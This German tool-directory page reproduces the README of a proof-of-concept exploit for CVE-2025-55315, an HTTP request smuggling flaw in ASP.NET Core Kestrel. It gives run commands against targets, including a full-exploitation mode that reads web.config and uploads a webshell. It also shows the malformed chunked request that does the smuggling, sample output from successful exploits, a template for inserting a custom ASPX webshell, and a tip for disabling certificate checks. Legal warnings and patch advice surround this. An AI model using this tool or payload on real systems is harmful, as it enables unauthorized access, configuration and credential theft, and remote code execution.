Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
Tools/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

Repository anzeigen
853vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55315 Pentest-Tool

Tool zur Ausnutzung von HTTP-Request-Smuggling für ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ RECHTLICHER HINWEIS

DIESES TOOL IST NUR FÜR AUTORISIERTE SICHERHEITSTESTS GEEIGNET!

  • Verwenden Sie es NUR auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unautorisierter Zugriff auf Computersysteme ist ILLEGAL.
  • Der Ersteller des Tools ist NICHT für Missbrauch verantwortlich.
  • Durch die Nutzung dieses Tools übernehmen Sie die volle rechtliche Verantwortung.

📋 Überblick

Professionelles Penetrationstest-Tool für CVE-2025-55315 (HTTP-Request-Smuggling-Schwachstelle in ASP.NET Core Kestrel). Dieses Tool ist für die Analyse einzelner Ziele mit umfassenden Exploit-Funktionen konzipiert.

Was ist CVE-2025-55315?

Eine kritische HTTP-Request-Smuggling-Schwachstelle im ASP.NET Core Kestrel-Webserver (CVSS 9.9/10), die Angreifern Folgendes ermöglicht:

  • Authentifizierung umgehen
  • Anmeldedaten und Sitzungstokens stehlen
  • Server-Side Request Forgery (SSRF) durchführen
  • Caches vergiften
  • Webshells hochladen und Remote-Codeausführung erlangen

Betroffene Versionen:

  • .NET Core 3.0 bis .NET 9.0.9
  • Behoben in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Funktionen

Kernfunktionen

  • ✅ Analyse einzelner Ziele - Konzentrierter Penetrationstest auf ein bestimmtes Ziel
  • ✅ Automatische Endpunkt-Erkennung - Findet gängige ASP.NET Core-Endpunkte
  • ✅ Manueller Endpunkt-Test - Testen bestimmter interessanter Endpunkte
  • ✅ Schwachstellenerkennung - Präzise Erkennung von CVE-2025-55315
  • ✅ web.config-Extraktion - Konfigurationsdateien per Request-Smuggling auslesen
  • ✅ Webshell-Upload - Optionale Bereitstellung von Webshells
  • ✅ Detaillierte Berichte - Berichte im JSON- und Textformat
  • ✅ Sicherheitsfunktionen - Mehrere Bestätigungsabfragen bei destruktiven Aktionen

Technische Funktionen

  • Unterstützung für HTTP/1.1 und HTTPS
  • Unterstützung benutzerdefinierter Ports
  • Konfigurierbare Timeouts
  • Ausführlicher Debug-Modus
  • Farbcodierte Terminalausgabe
  • Umgehung der SSL-Zertifikatsprüfung (für Tests)

🔧 Installation

Voraussetzungen

root@kitploit:~
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

root@kitploit:~
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Schnellstart

Grundlegender Schwachstellenscan

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

Das wird Folgendes tun:

  1. Serverinformationen sammeln
  2. Aktive Endpunkte automatisch erkennen
  3. Jeden Endpunkt auf CVE-2025-55315 testen
  4. Ergebnisse im Terminal anzeigen

Bestimmten Endpunkt testen

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Vollständiger Scan mit web.config-Extraktion

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Fortgeschritten: Vollständige Ausnutzung (nur mit Autorisierung!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Anwendungsbeispiele

Beispiel 1: Schneller Check

Szenario: Prüfen, ob der Produktionsserver verwundbar ist

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

Erwartete Dauer: 30-60 Sekunden


Beispiel 2: Detaillierter Scan

Szenario: Umfassender Endpunkt-Scan mit ausführlicher Ausgabe

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Erwartete Dauer: 2-5 Minuten


Beispiel 3: Mehrere Endpunkte anvisieren

Szenario: Bestimmte kritische Endpunkte testen

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Beispiel 4: Nicht-SSL-Ziel

Szenario: Internen HTTP-Server testen

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Kommandozeilenoptionen

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)

🔍 Die Ausgabe verstehen

Beispiel: Verwundbares System

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretation:

  • 🔴 KRITISCHE SCHWACHSTELLE ERKANNT
  • 🔴 Mehrere Endpunkte sind verwundbar
  • 🔴 Die Konfigurationsdatei wurde erfolgreich extrahiert
  • ⚡ DRINGEND: Auf .NET 8.0.21+ oder 9.0.10+ aktualisieren

Beispiel: Sicheres System

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretation:

  • ✅ SYSTEM IST SICHER
  • ✅ Es wird eine gepatchte Kestrel-Version ausgeführt
  • ✅ Alle fehlerhaften Anfragen wurden abgelehnt

🛡️ Sicherheit und Ethik

Autorisierungs-Checkliste

Stellen Sie vor der Ausführung dieses Tools sicher, dass:

  • Sie das Zielsystem besitzen, ODER
  • Sie eine schriftliche Genehmigung zum Testen haben, UND
  • das Sicherheitsteam benachrichtigt wurde, UND
  • Sie einen Rollback-Plan haben, UND
  • Sie die rechtlichen Auswirkungen verstehen

Integrierte Sicherheitsfunktionen

  1. Zweistufige Bestätigung - Das Tool fragt vor dem Start nach der Autorisierung
  2. Webshell-Upload-Bestätigung - Erfordert die Eingabe von „YES" in Großbuchstaben
  3. Ratenbegrenzung - Verzögerungen zwischen Anfragen während der automatischen Erkennung
  4. Timeout-Schutz - Verhindert hängende Verbindungen
  5. Detaillierte Protokollierung - Alle Aktionen werden für den Prüfpfad protokolliert

🔬 Technische Details

Ausnutzungstechnik

Das Tool nutzt CVE-2025-55315 mithilfe eines fehlerhaften Chunked-Transfer-Encodings aus:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Warum das funktioniert:

  1. Proxy-Server betrachtet \n als Zeilenende → verarbeitet die Anfrage als einzelne Anfrage
  2. Kestrel (verwundbar) ignoriert \n → behandelt die geschmuggelte GET-Anfrage als separate Anfrage
  3. Die geschmuggelte Anfrage kann im Sitzungskontext eines anderen Benutzers ausgeführt werden

Erkennungslogik

ServerantwortInterpretationStatus
400 Bad RequestKestrel hat den fehlerhaften Chunk abgelehnt✅ Sicher (gepatcht)
Mehrere HTTP/1.1Zwei separate Antworten empfangen❌ Verwundbar
500 oder 502Interner Serverfehler⚠️ Wahrscheinlich verwundbar
Normale 200 OKAnfrage akzeptiert⚠️ Nicht eindeutig

🐛 Fehlerbehebung

Verbindung fehlgeschlagen

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

Lösungen:

  • Überprüfen Sie, ob das Ziel erreichbar ist: ping target.com
  • Prüfen Sie, ob die Portnummer korrekt ist
  • Versuchen Sie es mit/ohne SSL: --no-ssl
  • Überprüfen Sie die Firewall-Regeln

SSL-Zertifikatsfehler

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

Lösung:

Das Tool deaktiviert die Zertifikatsprüfung bereits. Wenn das Problem weiterhin besteht:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

Timeout-Fehler

root@kitploit:~
[WARNING] No response - possible timeout

Lösungen:

  • Timeout erhöhen: --timeout 30
  • Netzwerkverbindung prüfen
  • Das Ziel ist möglicherweise langsam oder überlastet

Upload blockiert

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

Erklärung:

  • Die Serverkonfiguration blockiert PUT/POST-Methoden
  • Die WAF/IPS blockiert den Upload
  • Dateiberechtigungen verhindern Schreibvorgänge

Das ist normal - nicht alle verwundbaren Systeme erlauben Datei-Uploads.


📚 Referenzen

CVE-2025-55315-Ressourcen

  1. Microsoft Security Advisory: https://github.com/dotnet/aspnetcore/issues/64033

  2. NVD-Datenbank: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Praetorian Research ($10k Bug Bounty): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Technische Analyse von Andrew Lock: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

HTTP-Request-Smuggling

  1. PortSwigger Research: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 Anpassung

Benutzerdefinierte Endpunkte hinzufügen

Bearbeiten Sie COMMON_ENDPOINTS im Skript:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]

Benutzerdefinierte Webshell verwenden

Modifizieren Sie die Methode upload_webshell():

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''

📝 Probleme melden

Wenn Sie Fehler finden oder Vorschläge haben:

  1. Führen Sie das Tool mit dem ausführlichen Modus aus: -v
  2. Speichern Sie die vollständige Ausgabe: -o debug.txt
  3. Geben Sie Folgendes an:
    • Python-Version
    • Verwendeten Befehl
    • Fehlermeldung
    • Erwartetes vs. tatsächliches Verhalten

⚖️ Rechtlicher Haftungsausschluss

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!

🎓 Bildungszweck

Dieses Tool wurde erstellt für:

  • Sicherheitsforscher
  • Penetrationstester
  • Bug-Bounty-Jäger
  • Systemadministratoren
  • Schulungen zum Sicherheitsbewusstsein
  • Autorisierte Sicherheitsbewertungen

Nicht für:

  • Bösartige Angriffe
  • Unautorisierten Zugriff
  • Konkurrenzausspähung
  • Illegale Aktivitäten

🙏 Danksagungen

  • Microsoft Security Response Center - Für die Offenlegung der CVE und Patches
  • Praetorian Security - Für die ursprüngliche Schwachstellenforschung
  • Andrew Lock - Für die detaillierte technische Analyse
  • Sicherheits-Community - Für verantwortungsvolle Offenlegungspraktiken

📄 Lizenz

Nur für Bildungszwecke und autorisierte Sicherheitstests

Dieses Tool wird für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Kommerzielle Nutzung, Weiterverbreitung oder Verwendung für bösartige Zwecke ist strengstens untersagt.


🔐 Abschließende Warnung

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

Tool herunterladen